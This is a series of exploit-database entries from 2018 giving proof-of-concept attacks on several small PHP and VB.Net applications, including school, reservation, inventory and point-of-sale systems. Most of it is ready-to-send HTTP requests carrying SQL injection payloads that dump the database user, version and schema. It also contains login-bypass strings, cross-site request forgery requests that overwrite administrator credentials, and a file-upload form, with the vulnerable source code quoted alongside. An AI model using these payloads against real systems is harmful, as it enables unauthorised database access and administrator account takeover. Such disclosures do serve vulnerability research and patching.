|
||||
#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
|
||||
#26 //echo $sql;
|
||||
#27 $res=mysqli_query($conn, $sql) or die(mysqli_error($conn));
|
||||
#28
|
||||
#29 //echo mysqli_num_rows($res);
|
||||
#30 //exit;
|
||||
#31 if(mysqli_num_rows($res)>=1)
|
||||
#32 {
|
||||
#....
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 282
|
||||
batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:42:01 GMT
|
||||
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
|
||||
X-Powered-By: PHP/7.1.22
|
||||
Content-Length: 311
|
||||
Keep-Alive: timeout=5, max=99
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 278
|
||||
b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:58:04 GMT
|
||||
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
|
||||
X-Powered-By: PHP/7.1.22
|
||||
Content-Length: 1315
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 280
|
||||
sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:58:15 GMT
|
||||
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
|
||||
X-Powered-By: PHP/7.1.22
|
||||
Content-Length: 1313
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 4)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 280
|
||||
division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:58:26 GMT
|
||||
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
|
||||
X-Powered-By: PHP/7.1.22
|
||||
Content-Length: 1313
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 5)
|
||||
# http://localhost/[PATH]/submit_feedback.php
|
||||
#
|
||||
POST /[PATH]/submit_feedback.php HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 279
|
||||
roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 00:58:33 GMT
|
||||
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
|
||||
X-Powered-By: PHP/7.1.22
|
||||
Content-Length: 1314
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
37
exploits/php/webapps/45713.txt
Normal file
37
exploits/php/webapps/45713.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
|
||||
#
|
||||
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 106
|
||||
USERID=1&UNAME=Anonymous&USERNAME=admin&deptid=&UPASS=Efe&ROLE=Administrator&deptid=&PHONE=912856478&save=
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 20:16:05 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 57
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
11
exploits/php/webapps/45717.txt
Normal file
11
exploits/php/webapps/45717.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Exploit Title: MOGG web simulator Script - SQL Injection
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce -
|
||||
@dorsateam
|
||||
# Vendor Homepage: https://github.com/spider312/mtgas
|
||||
# Version: All Version
|
||||
|
||||
|
||||
Exploit :
|
||||
http://server/play.php?id=99999'+[SQL Command]+#
|
||||
http://server/play.php?id=99999%27+and+extractvalue(1,concat(0x3a,user(),0x3a))%23
|
56
exploits/php/webapps/45718.txt
Normal file
56
exploits/php/webapps/45718.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
|
||||
#
|
||||
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 114
|
||||
account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save=
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 29 Oct 2018 08:20:21 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Content-Length: 57
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage
|
||||
#
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage" enctype="multipart/form-data" method="POST">
|
||||
<input id="image" name="image" type="file"></td>
|
||||
<button name="save" type="submit">Save</button>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#....
|
119
exploits/php/webapps/45719.txt
Normal file
119
exploits/php/webapps/45719.txt
Normal file
|
@ -0,0 +1,119 @@
|
|||
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
|
||||
# Version: 1.0
|
||||
# Category: Windows
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18803
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# User: 'or 1=1 or ''='
|
||||
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# User: 'or 1=1 or ''='
|
||||
# Pass: Null
|
||||
#
|
||||
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
|
||||
|
||||
#[PATH]/frmCourse.vb
|
||||
#....
|
||||
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
|
||||
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
|
||||
#49 reloadDtg(sql, dtglist)
|
||||
#50 End Sub
|
||||
#....
|
||||
|
||||
#[PATH]/includes/user.vb
|
||||
#....
|
||||
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
|
||||
#06 Try
|
||||
#07
|
||||
#08 con.Open()
|
||||
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
|
||||
#10
|
||||
#11
|
||||
#12 If dt.Rows.Count > 0 Then
|
||||
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
|
||||
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
||||
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
|
||||
#16 With Form1
|
||||
#17 .tsAddG.Enabled = True
|
||||
#18 .tsStudent.Enabled = True
|
||||
#19 .tsCurriculum.Enabled = True
|
||||
#20 .tsGrades.Enabled = True
|
||||
#21 .tsReport.Enabled = True
|
||||
#22 .tsUtilities.Enabled = True
|
||||
#23 .tsSearchStudent.Enabled = True
|
||||
#24 .tsLogin.Image = My.Resources.logout
|
||||
#25 .tsLogin.Text = "Logout"
|
||||
#26 End With
|
||||
#27
|
||||
#28
|
||||
#29 LoginForm1.Close()
|
||||
#30
|
||||
#31
|
||||
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
|
||||
#33
|
||||
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
||||
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
|
||||
#36 With Form1
|
||||
#37 .tsAddG.Enabled = True
|
||||
#38 .tsStudent.Enabled = True
|
||||
#39 .tsCurriculum.Enabled = True
|
||||
#40 .tsGrades.Enabled = True
|
||||
#41 .tsReport.Enabled = True
|
||||
#42 .tsSearchStudent.Enabled = True
|
||||
#43 .tsLogin.Image = My.Resources.logout
|
||||
#44 .tsLogin.Text = "Logout"
|
||||
#45 End With
|
||||
#46
|
||||
#47
|
||||
#48
|
||||
#49
|
||||
#50 LoginForm1.Close()
|
||||
#51
|
||||
#52
|
||||
#53
|
||||
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
|
||||
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
|
||||
#56 'With Form1
|
||||
#57 With Form1
|
||||
#58 .tsAddG.Enabled = True
|
||||
#59 .tsStudent.Enabled = True
|
||||
#60 .tsCurriculum.Enabled = True
|
||||
#61 .tsGrades.Enabled = True
|
||||
#62 .tsReport.Enabled = True
|
||||
#63
|
||||
#64 .tsSearchStudent.Enabled = True
|
||||
#65 .tsLogin.Image = My.Resources.logout
|
||||
#66 .tsLogin.Text = "Logout"
|
||||
#67 End With
|
||||
#68
|
||||
#69
|
||||
#70 LoginForm1.Close()
|
||||
#71 End If
|
||||
#72
|
||||
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
|
||||
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
|
||||
#75 'Form1.StatusStrip1.Visible = True
|
||||
#76 'inserting logs
|
||||
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
|
||||
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
|
||||
#79 'create(sql)
|
||||
#80
|
||||
#81 Else
|
||||
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
|
||||
#83 End If
|
||||
#84 Catch ex As Exception
|
||||
#85 MsgBox(ex.Message)
|
||||
#86 End Try
|
||||
#87 con.Close()
|
||||
#88 da.Dispose()
|
||||
#89 End Sub
|
||||
#....
|
73
exploits/php/webapps/45720.txt
Normal file
73
exploits/php/webapps/45720.txt
Normal file
|
@ -0,0 +1,73 @@
|
|||
# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
|
||||
# Version: 1.0
|
||||
# Category: Windows
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18804
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# User: 'or 1=1 or ''='
|
||||
# Pass: 'or 1=1 or ''='
|
||||
#
|
||||
# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
|
||||
#
|
||||
#[PATH]/include/publicfunction.vb
|
||||
#....
|
||||
#237 Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
|
||||
#238 Try
|
||||
#239 con.Open()
|
||||
#240
|
||||
#241 cmd = New OleDb.OleDbCommand
|
||||
#242 With cmd
|
||||
#243 .Connection = con
|
||||
#244 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
|
||||
#245 End With
|
||||
#246
|
||||
#247 da = New OleDb.OleDbDataAdapter
|
||||
#248 da.SelectCommand = cmd
|
||||
#249 dt = New DataTable
|
||||
#250 da.Fill(dt)
|
||||
#251
|
||||
#252 If dt.Rows.Count > 0 Then
|
||||
#253
|
||||
#254 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
|
||||
#255
|
||||
#256 MsgBox("You login as administrator!!")
|
||||
#257
|
||||
#258 ShowForm(LoginForm1, Form1)
|
||||
#259
|
||||
#260
|
||||
#261 LoginForm1.Hide()
|
||||
#262 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
|
||||
#263
|
||||
#264 MsgBox("You login as Staff!!")
|
||||
#265
|
||||
#266 With Form1
|
||||
#267 '.ManageUsersToolStripMenuItem.Visible = False
|
||||
#268
|
||||
#269 End With
|
||||
#270
|
||||
#271 ShowForm(LoginForm1, Form1)
|
||||
#272
|
||||
#273
|
||||
#274 LoginForm1.Hide()
|
||||
#275 End If
|
||||
#276
|
||||
#277 Else
|
||||
#278 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
|
||||
#279 End If
|
||||
#280
|
||||
#281 Catch ex As Exception
|
||||
#282
|
||||
#283 MsgBox(ex.Message)
|
||||
#284 Finally
|
||||
#285 con.Close()
|
||||
#286 da.Dispose()
|
||||
#287 End Try
|
||||
#288 End Sub
|
||||
#....
|
43
exploits/php/webapps/45721.txt
Normal file
43
exploits/php/webapps/45721.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/poinofsales_0.zip
|
||||
# Version: 1.0
|
||||
# Category: Windows
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18805
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
|
||||
# Pass: Null
|
||||
#
|
||||
# https://2.bp.blogspot.com/-qlfhS-GUaCQ/W9Yt3aHdLHI/AAAAAAAAENg/Hmxj2lZ62cYITPlTNaNrwwAgh379Cbi8ACLcBGAs/s1600/sql3.png
|
||||
#
|
||||
#[PATH]/LoginForm1.vb
|
||||
#....
|
||||
#11 Private Sub OK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles OK.Click
|
||||
#12 sql = "SELECT * FROM `tblemployee` WHERE `USERNAME` ='" & UsernameTextBox.Text & "' and `PASSWRD` = sha1('" & PasswordTextBox.Text & "')"
|
||||
#13 janobefindthis(sql)
|
||||
#14
|
||||
#15 If GetNumRows() = 1 Then
|
||||
#16 LoadSingleResult("login")
|
||||
#17 ' MsgBox(fullname)
|
||||
#18 Form1.statsloginname.Text = fullname
|
||||
#19 Form1.tsLogin.Text = "Logout"
|
||||
#20
|
||||
#21 If usertype = "Administrator" Then
|
||||
#22 Visible_Admin(True)
|
||||
#23 Else
|
||||
#24 Visible_Cashier(True)
|
||||
#25 End If
|
||||
#26 Else
|
||||
#27 MsgBox("Username or Password not registered!")
|
||||
#28 End If
|
||||
#29
|
||||
#30
|
||||
#31 Me.Close()
|
||||
#32 End Sub
|
||||
#....
|
108
exploits/php/webapps/45722.txt
Normal file
108
exploits/php/webapps/45722.txt
Normal file
|
@ -0,0 +1,108 @@
|
|||
# Exploit Title: School Event Management System 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18795
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/student/view.php
|
||||
#01 <?php
|
||||
#02 $student = New Student();
|
||||
#03 $res = $student->select_student($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06 $course = New Course();
|
||||
#07 $resCourse = $course->single_course($res->CourseID);
|
||||
#08
|
||||
#09 ?>
|
||||
GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:02:29 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=82
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/event/view.php
|
||||
#01 <?php
|
||||
#02 $event = New Event();
|
||||
#03 $res = $event->single_event($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06
|
||||
#07 ?>
|
||||
GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
|
||||
Connection: keep-alive
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Oct 2018 17:12:15 GMT
|
||||
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
|
||||
X-Powered-By: PHP/5.6.30
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|
||||
Pragma: no-cache
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Transfer-Encoding: chunked
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
# POC:
|
||||
# 3)
|
||||
# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
|
||||
#
|
||||
#[PATH]/user/view.php
|
||||
#01 <?php
|
||||
#02 $user = New User();
|
||||
#03 $res = $user->single_user($_GET['id']);
|
||||
#04
|
||||
#05
|
||||
#06
|
||||
#07 ?>
|
||||
GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
|
||||
Host: TARGET
|
||||
